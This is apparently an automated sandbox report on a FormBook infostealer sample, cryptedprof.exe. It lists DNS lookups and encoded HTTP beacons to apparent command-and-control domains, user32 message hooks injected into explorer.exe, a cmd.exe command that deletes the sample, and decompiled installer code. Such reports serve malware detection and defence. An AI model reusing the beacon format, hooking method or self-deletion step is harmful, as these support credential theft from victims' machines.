                                                                                      Feb 23, 2021 15:30:43.022846937 CET6204453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:30:43.090131044 CET53620448.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:11.082956076 CET6379153192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:11.134610891 CET53637918.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:11.895347118 CET6426753192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:11.944017887 CET53642678.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:12.847143888 CET4944853192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:12.898746967 CET53494488.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:13.631004095 CET6034253192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:13.684792995 CET53603428.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:14.428874016 CET6134653192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:14.478703022 CET53613468.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:15.570743084 CET5177453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:15.619601011 CET53517748.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:16.335077047 CET5602353192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:16.394454002 CET53560238.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:16.494822025 CET5838453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:16.546437025 CET53583848.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:17.261225939 CET6026153192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:17.312848091 CET53602618.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:18.038053989 CET5606153192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:18.086622953 CET53560618.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:19.267477036 CET5833653192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:19.319128990 CET53583368.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:20.657476902 CET5378153192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:20.706202984 CET53537818.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:21.828244925 CET5406453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:21.879611969 CET53540648.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:26.449898958 CET5281153192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:26.500972033 CET53528118.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:27.526665926 CET5529953192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:27.579718113 CET53552998.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:28.497622013 CET6374553192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:28.548201084 CET53637458.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:29.678368092 CET5005553192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:29.733423948 CET53500558.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:30.844587088 CET6137453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:30.896049023 CET53613748.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:36.151079893 CET5033953192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:36.217627048 CET53503398.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:37.760253906 CET6330753192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:37.809017897 CET53633078.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:50.291194916 CET4969453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:50.353537083 CET53496948.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:50.897938967 CET5498253192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:50.957060099 CET53549828.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:51.536858082 CET5001053192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:51.594027996 CET53500108.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:52.113111973 CET6371853192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:52.159181118 CET6211653192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:52.177457094 CET53637188.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:52.217801094 CET53621168.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:52.341439962 CET6381653192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:52.408416033 CET53638168.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:52.680592060 CET5501453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:52.731338024 CET53550148.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:53.268157959 CET6220853192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:53.330169916 CET53622088.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:53.975930929 CET5757453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:54.027441025 CET53575748.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:55.391679049 CET5181853192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:55.441854954 CET53518188.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:56.758450031 CET5662853192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:56.818296909 CET53566288.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:57.554359913 CET6077853192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:57.616803885 CET53607788.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:32:01.334067106 CET5379953192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:32:01.410595894 CET53537998.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:32:20.171560049 CET5468353192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:32:20.223088980 CET53546838.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:32:20.575880051 CET5932953192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:32:20.635864973 CET53593298.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:32:21.268004894 CET6402153192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:32:21.325251102 CET53640218.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:32:21.792572975 CET5612953192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:32:22.009269953 CET53561298.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:32:43.900327921 CET5817753192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:32:44.192182064 CET53581778.8.8.8192.168.2.6

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Feb 23, 2021 15:32:01.334067106 CET192.168.2.68.8.8.80xcf60Standard query (0)www.thatlocaljawn.comA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 15:32:21.792572975 CET192.168.2.68.8.8.80xcc94Standard query (0)www.warungsuntik.comA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 15:32:43.900327921 CET192.168.2.68.8.8.80x5f23Standard query (0)www.tabandolano.onlineA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Feb 23, 2021 15:32:01.410595894 CET8.8.8.8192.168.2.60xcf60No error (0)www.thatlocaljawn.comthatlocaljawn.comCNAME (Canonical name)IN (0x0001)
                                                                                      Feb 23, 2021 15:32:01.410595894 CET8.8.8.8192.168.2.60xcf60No error (0)thatlocaljawn.com34.102.136.180A (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 15:32:22.009269953 CET8.8.8.8192.168.2.60xcc94No error (0)www.warungsuntik.com168.206.81.138A (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 15:32:44.192182064 CET8.8.8.8192.168.2.60x5f23No error (0)www.tabandolano.onlinetabandolano.onlineCNAME (Canonical name)IN (0x0001)
                                                                                      Feb 23, 2021 15:32:44.192182064 CET8.8.8.8192.168.2.60x5f23No error (0)tabandolano.online111.221.46.49A (IP address)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • www.thatlocaljawn.com
                                                                                      • www.warungsuntik.com
                                                                                      • www.tabandolano.online

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.64974634.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Feb 23, 2021 15:32:01.456680059 CET6332OUTGET /rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk HTTP/1.1
                                                                                      Host: www.thatlocaljawn.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Feb 23, 2021 15:32:01.600872040 CET6333INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Tue, 23 Feb 2021 14:32:01 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6031584e-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.649752168.206.81.13880C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Feb 23, 2021 15:32:22.405430079 CET6365OUTGET /rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk HTTP/1.1
                                                                                      Host: www.warungsuntik.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Feb 23, 2021 15:32:22.799669981 CET6368INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Tue, 23 Feb 2021 14:32:22 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 479
                                                                                      Connection: close
                                                                                      ETag: "601d0d01-1df"
                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.649753111.221.46.4980C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Feb 23, 2021 15:32:44.386287928 CET6388OUTGET /rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk HTTP/1.1
                                                                                      Host: www.tabandolano.online
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Feb 23, 2021 15:32:44.603816986 CET6388INHTTP/1.1 302 Found
                                                                                      Date: Tue, 23 Feb 2021 14:32:44 GMT
                                                                                      Server: Apache
                                                                                      Location: http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk
                                                                                      Content-Length: 346
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 61 62 61 6e 64 6f 6c 61 6e 6f 2e 6f 6e 6c 69 6e 65 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 3f 56 52 4e 68 3d 43 73 6b 34 67 69 30 41 32 74 65 4f 48 63 68 4e 78 6c 48 6d 66 6b 33 73 5a 6b 4e 55 57 48 53 68 6b 54 36 44 73 4e 76 45 62 4f 65 43 49 36 47 39 44 47 64 31 6a 6a 52 79 4a 32 73 49 5a 33 72 51 44 6a 57 57 7a 55 77 79 62 77 3d 3d 26 61 6d 70 3b 6a 4c 30 38 6c 32 3d 57 58 4c 30 30 34 35 30 47 46 6f 48 6b 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&amp;jL08l2=WXL00450GFoHk">here</a>.</p></body></html>


                                                                                      Code Manipulations

                                                                                      User Modules

                                                                                      Hook Summary

                                                                                      Function NameHook TypeActive in Processes
                                                                                      PeekMessageAINLINEexplorer.exe
                                                                                      PeekMessageWINLINEexplorer.exe
                                                                                      GetMessageWINLINEexplorer.exe
                                                                                      GetMessageAINLINEexplorer.exe

                                                                                      Processes

                                                                                      Process: explorer.exe, Module: user32.dll
                                                                                      Function NameHook TypeNew Data
                                                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEA
                                                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEA
                                                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEA
                                                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEA

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      Analysis Process: cryptedprof.exe PID: 6980 Parent PID: 5964

                                                                                      General

                                                                                      Start time:15:30:48
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Users\user\Desktop\cryptedprof.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\cryptedprof.exe'
                                                                                      Imagebase:0x400000
                                                                                      File size:339210 bytes
                                                                                      MD5 hash:72EFE20E4A59AE2722383B8786956994
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      Chronological Activities

                                                                                      Analysis Process: cryptedprof.exe PID: 7064 Parent PID: 6980

                                                                                      General

                                                                                      Start time:15:30:48
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Users\user\Desktop\cryptedprof.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\cryptedprof.exe'
                                                                                      Imagebase:0x400000
                                                                                      File size:339210 bytes
                                                                                      MD5 hash:72EFE20E4A59AE2722383B8786956994
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      Chronological Activities

                                                                                      Analysis Process: explorer.exe PID: 3440 Parent PID: 7064

                                                                                      General

                                                                                      Start time:15:30:54
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:
                                                                                      Imagebase:0x7ff6f22f0000
                                                                                      File size:3933184 bytes
                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: msdt.exe PID: 984 Parent PID: 3440

                                                                                      General

                                                                                      Start time:15:31:15
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\SysWOW64\msdt.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                                      Imagebase:0x180000
                                                                                      File size:1508352 bytes
                                                                                      MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:moderate

                                                                                      Chronological Activities

                                                                                      Analysis Process: cmd.exe PID: 6592 Parent PID: 984

                                                                                      General

                                                                                      Start time:15:31:19
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:/c del 'C:\Users\user\Desktop\cryptedprof.exe'
                                                                                      Imagebase:0x2a0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: conhost.exe PID: 6608 Parent PID: 6592

                                                                                      General

                                                                                      Start time:15:31:19
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff61de10000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >

                                                                                        Analysis Process: cryptedprof.exe PID: 6980 Parent PID: 5964 cryptedprof.exeCOMMON

                                                                                        Executed Functions

                                                                                        Function 00403486, Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 366stringcomfileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 86%
                                                                                        			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f44c = _t42;
				if(_t42 != 6) {
					_t119 = E00406656(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004065E8(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406656(0xb);
				 *0x42f444 = E00406656(9);
				_t47 = E00406656(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f44f =  *0x42f44f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f518 = _t47;
				SHGetFileInfoA(0x429878, 0, _t164 + 0x38, 0x160, 0); // executed
				E0040624D("Setup Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\engineer\\Desktop\\cryptedprof.exe\" ";
				E0040624D(_t160, _t51);
				 *0x42f440 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\engineer\\Desktop\\cryptedprof.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405C10(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405C10(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
